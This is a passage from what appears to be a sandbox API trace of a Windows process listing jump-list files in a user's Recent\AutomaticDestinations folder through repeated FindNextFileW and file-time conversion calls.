ftLastAccessTime.dwLowDateTime=0x6765bb0e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x6765bb0e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="9c08ad74ad8708df.automaticDestinations-ms", cAlternateFileName="9C08AD~1.AUT")) returned 1 [0113.160] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.160] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.160] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64ad8bc0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x64ad8bc0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x64ad8bc0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="9cfafb05ce914942.automaticDestinations-ms", cAlternateFileName="9CFAFB~1.AUT")) returned 1 [0113.160] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.160] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.160] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b60346b, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x1b60346b, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x1b60346b, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="9d1f905ce5044aee.automaticDestinations-ms", cAlternateFileName="9D1F90~1.AUT")) returned 1 [0113.160] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.160] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.160] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76210a8a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x76210a8a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x641e7d87, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="b8ab77100df80ab2.automaticDestinations-ms", cAlternateFileName="B8AB77~1.AUT")) returned 1 [0113.160] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.160] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.160] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x646f8d57, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x646f8d57, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x646f8d57, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="b8b3a97bfbf120b6.automaticDestinations-ms", cAlternateFileName="B8B3A9~1.AUT")) returned 1 [0113.160] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.160] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.160] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x672a206a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x672a206a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x672a206a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="d00655d2aa12ff6d.automaticDestinations-ms", cAlternateFileName="D00655~1.AUT")) returned 1 [0113.160] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.160] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.160] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe934f82b, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe934f82b, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe939bc49, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="e2b05a77dbda5b5c.automaticDestinations-ms", cAlternateFileName="E2B05A~1.AUT")) returned 1 [0113.160] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.160] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.160] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf981f92, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xbf981f92, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xa388ec7c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x8e1c, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="f01b4d95cf55d32a.automaticDestinations-ms", cAlternateFileName="F01B4D~1.AUT")) returned 1 [0113.161] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.161] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.161] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67fe51f2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x67fe51f2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x67fe51f2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="fb3b0dbfee58fac8.automaticDestinations-ms", cAlternateFileName="FB3B0D~1.AUT")) returned 1 [0113.161] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.161] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.161] FindNextFileW (in: hFindFile=0xa1bc78, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67fe51f2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x67fe51f2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x67fe51f2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="fb3b0dbfee58fac8.automaticDestinations-ms", cAlternateFileName="FB3B0D~1.AUT")) returned 0 [0113.161] GetLastError () returned 0x12 [0113.161] FindClose (in: hFindFile=0xa1bc78 | out: hFindFile=0xa1bc78) returned 1 [0113.161] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf95bd2d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe934f82b, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe934f82b, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bd90 [0113.161] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0113.161] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.161] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf95bd2d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe934f82b, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe934f82b, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0113.161] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.161] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.161] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x651ffc2f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x651ffc2f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x651ffc2f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="162797d679096999.automaticDestinations-ms", cAlternateFileName="162797~1.AUT")) returned 1 [0113.161] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.161] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.161] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ce308d7, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x8ce308d7, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x92aa4b2b, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="1b4dd67f29cb1962.automaticDestinations-ms", cAlternateFileName="1B4DD6~1.AUT")) returned 1 [0113.161] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.161] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.161] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6623dd20, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6623dd20, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x66263f3d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="1b6ebacd7cd2f25a.automaticDestinations-ms", cAlternateFileName="1B6EBA~1.AUT")) returned 1 [0113.161] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.161] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.161] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66a9610b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x66a9610b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x66a9610b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="1bc9bbbe61f14501.automaticDestinations-ms", cAlternateFileName="1BC9BB~1.AUT")) returned 1 [0113.162] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.162] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.162] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f0b5bcc, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3f0b5bcc, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x91fc39db, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="319f01bf9fe00f2d.automaticDestinations-ms", cAlternateFileName="319F01~1.AUT")) returned 1 [0113.162] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.162] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.162] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x658b4643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x658b4643, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x658b4643, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="5175b273ceba776b.automaticDestinations-ms", cAlternateFileName="5175B2~1.AUT")) returned 1 [0113.162] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.162] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.162] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xa384288f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x25478, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="5f7b5f1e01b83767.automaticDestinations-ms", cAlternateFileName="5F7B5F~1.AUT")) returned 1 [0113.162] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.162] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.162] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64e6c3a5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x64e6c3a5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x64e6c3a5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="61ebb1e65cfcb8da.automaticDestinations-ms", cAlternateFileName="61EBB1~1.AUT")) returned 1 [0113.162] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.162] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.162] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef89c12b, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef89c12b, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef89c12b, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="6824f4a902c78fbd.automaticDestinations-ms", cAlternateFileName="6824F4~1.AUT")) returned 1 [0113.162] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.162] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.162] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e75d9e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x66e75d9e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x66e75d9e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="6d2bac8f1edf6668.automaticDestinations-ms", cAlternateFileName="6D2BAC~1.AUT")) returned 1 [0113.162] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.162] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.162] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66669e90, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x66669e90, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x66669e90, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="75668a91ce73b054.automaticDestinations-ms", cAlternateFileName="75668A~1.AUT")) returned 1 [0113.162] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.162] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.162] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67a61ae6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x67a61ae6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x67a61ae6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="78f0afb5bd4bb278.automaticDestinations-ms", cAlternateFileName="78F0AF~1.AUT")) returned 1 [0113.162] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.162] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.162] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37f27bc, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x37f27bc, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x5bc77d9d, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="7e4dca80246863e3.automaticDestinations-ms", cAlternateFileName="7E4DCA~1.AUT")) returned 1 [0113.162] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.162] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.162] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65cba52e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x65cba52e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x65cba52e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="80d13f95c2c02af9.automaticDestinations-ms", cAlternateFileName="80D13F~1.AUT")) returned 1 [0113.162] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.162] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.162] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6765bb0e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6765bb0e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x6765bb0e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="9c08ad74ad8708df.automaticDestinations-ms", cAlternateFileName="9C08AD~1.AUT")) returned 1 [0113.162] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.162] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.162] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64ad8bc0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x64ad8bc0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x64ad8bc0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="9cfafb05ce914942.automaticDestinations-ms", cAlternateFileName="9CFAFB~1.AUT")) returned 1 [0113.163] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.163] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.163] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b60346b, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x1b60346b, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x1b60346b, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="9d1f905ce5044aee.automaticDestinations-ms", cAlternateFileName="9D1F90~1.AUT")) returned 1 [0113.163] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.163] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.163] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76210a8a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x76210a8a, 